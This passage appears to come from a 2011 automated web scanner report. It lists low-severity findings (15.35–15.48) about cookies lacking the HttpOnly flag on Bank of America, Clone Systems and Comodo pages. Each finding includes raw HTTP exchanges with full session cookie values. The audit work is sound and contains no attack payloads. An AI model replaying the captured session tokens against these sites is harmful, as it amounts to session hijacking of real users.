Path:   /homepage/stateSelect.go

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage/stateSelect.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 12:46:50 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: DENY
Location: https://www.bankofamerica.com/content/documents/homepage/fail-over-state.htm
Content-Length: 0
Set-Cookie: JSESSIONID=00003O0kJlXrnqBcEyceskzwEx7:15povac7t; Path=/
Set-Cookie: state=""; Expires=Sun, 23 Oct 2011 12:46:49 GMT; Path=/; Domain=.bankofamerica.com
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Via: On-Demand Router/1.0
Connection: close
Content-Type: text/plain
Content-Language: en-US


15.35. https://www.bankofamerica.com/hub/index.action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /hub/index.action

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hub/index.action HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:47 GMT
Content-length: 0
Content-type: text/html
Location: https://www.bankofamerica.com/
Content-language: en-US
Set-cookie: JSESSIONID=0000jDExf79KwoJiPqPak-dMSvO:12qb4k93q; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


15.36. https://www.bankofamerica.com/planning/investments.action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /planning/investments.action

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /planning/investments.action HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:46:24 GMT
Content-type: text/html
X-frame-options: SAMEORIGIN
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: no-cache, post-check=0, pre-check=0
Content-language: en-US
Set-cookie: JSESSIONID=0000rWPRdxp_eJqsXUf5F7_JnZu:12rfueg3b; Path=/; Secure
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...

15.37. https://www.bankofamerica.com/privacy/Control.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /privacy/Control.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy/Control.do?body=privacysecur_unauthorised_acc_use HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:49 GMT
Content-length: 0
Location: https://www.bankofamerica.com/privacy/Control.do?body=privacysecur_resolve_fraud
Content-language: en-US
Set-cookie: JSESSIONID=00001VjF6Tcy6jJdOdG1SbWoNG-:12qb4kb6q; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


15.38. https://www.bankofamerica.com/privacy/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /privacy/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:48 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000HFr9VVqs6DZvnB1LrBiUHIT:12qb4k93q; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descri
...[SNIP]...

15.39. https://www.bankofamerica.com/search/Search.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /search/Search.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/Search.do HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:49 GMT
Content-length: 0
Location: https://www6.bankofamerica.com/search/Search.do
Content-language: en-US
Set-cookie: JSESSIONID=0000xbRy8_ejvIwVZwAv3xumRzj:13ihk3qeh; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


15.40. https://www.bankofamerica.com/sitemap/index.action  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /sitemap/index.action

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitemap/index.action HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:49 GMT
Content-type: text/html
Content-language: en-US
Set-cookie: JSESSIONID=0000aVeK6__6b2P_opoG6dHbQVR:12qb4k2ev; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
<head>
<title>Bank of America Site Map</title>

<meta http-equiv="content-type" content="text/html; charset=is
...[SNIP]...

15.41. https://www.bankofamerica.com/smallbusiness/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.bankofamerica.com
Path:   /smallbusiness/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smallbusiness/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:46:04 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000RP8_STCkOcHUGUzx8ITXdFM:12rfueg3b; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descript
...[SNIP]...

15.42. http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/categories/PCI-ASV-Scanning-Services/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/categories/PCI-ASV-Scanning-Services/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:48 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=at9kctjodfv3r3iam6cs56aqf7; expires=Tue, 26-Apr-2011 23:55:48 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 24887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...

15.43. http://www.clone-systems.com/ecommerce/categories/Penetration-Testing/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/categories/Penetration-Testing/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/categories/Penetration-Testing/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:49 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=t5s0kmeibbbtts6cq9hfdffs02; expires=Tue, 26-Apr-2011 23:55:49 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 21466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...

15.44. http://www.clone-systems.com/ecommerce/categories/Vulnerability-Scan-Services/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/categories/Vulnerability-Scan-Services/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/categories/Vulnerability-Scan-Services/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:47 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=bk4mm1ag6ue392h3jsauk88r25; expires=Tue, 26-Apr-2011 23:55:47 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 23560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...

15.45. http://www.clone-systems.com/ecommerce/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/index.php?action=tracking_script HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.clone-systems.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:25:33 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=o07bfks454r08e1ev5t4uf6is4; expires=Wed, 27-Apr-2011 00:25:33 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Tue, 03 May 2011 00:25:33 +0000
Cache-Control: public,maxage=604800
Pragma: public
Content-Length: 190
Content-Type: text/javascript


               var img = new Image(1, 1);
               img.src = 'http://www.clone-systems.com/ecommerce/index.php?action=track_visitor&'+new Date().getTime();
               img.onload = function() { return true; };
           

15.46. http://www.clone-systems.com/pci-scanning.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /pci-scanning.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pci-scanning.html HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:45:22 GMT
Server: Apache
Set-Cookie: CMSSESSIDe4d04fcf=s3t5qkd9ses049sa9ue07c8l81; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 25 Apr 2011 23:45:22 GMT
X-Powered-By: Nette Framework
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 16914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head>

<title>PCI S
...[SNIP]...

15.47. http://www.clone-systems.com/stylesheet.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /stylesheet.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /stylesheet.php?cssid=31&mediatype=screen HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.clone-systems.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:25:11 GMT
Server: Apache
Set-Cookie: CMSSESSIDe4d04fcf=b8nicomnjrk2oh04j9amqhf616; path=/
Expires: Tue, 26 Apr 2011 03:25:11 GMT
Cache-Control: public, max-age=10800
Last-Modified: Tue, 26 Apr 2011 00:25:10 GMT
X-Powered-By: Nette Framework
Etag: "f1688bee3cc8398af5a80c595e645816"
Vary: Accept-Encoding
Content-Type: text/css; charset=utf-8
Content-Length: 2811

/* Start of CMSMS style sheet 'Accessibility and cross-browser tools' */
/* accessibility */
/* menu links accesskeys */
span.accesskey {
   text-decoration: none;
}
/* accessibility divs are hidde
...[SNIP]...

15.48. http://www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.comodo.com
Path:   /resources/webinars/e-commerce/pci-compliance-demystified.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

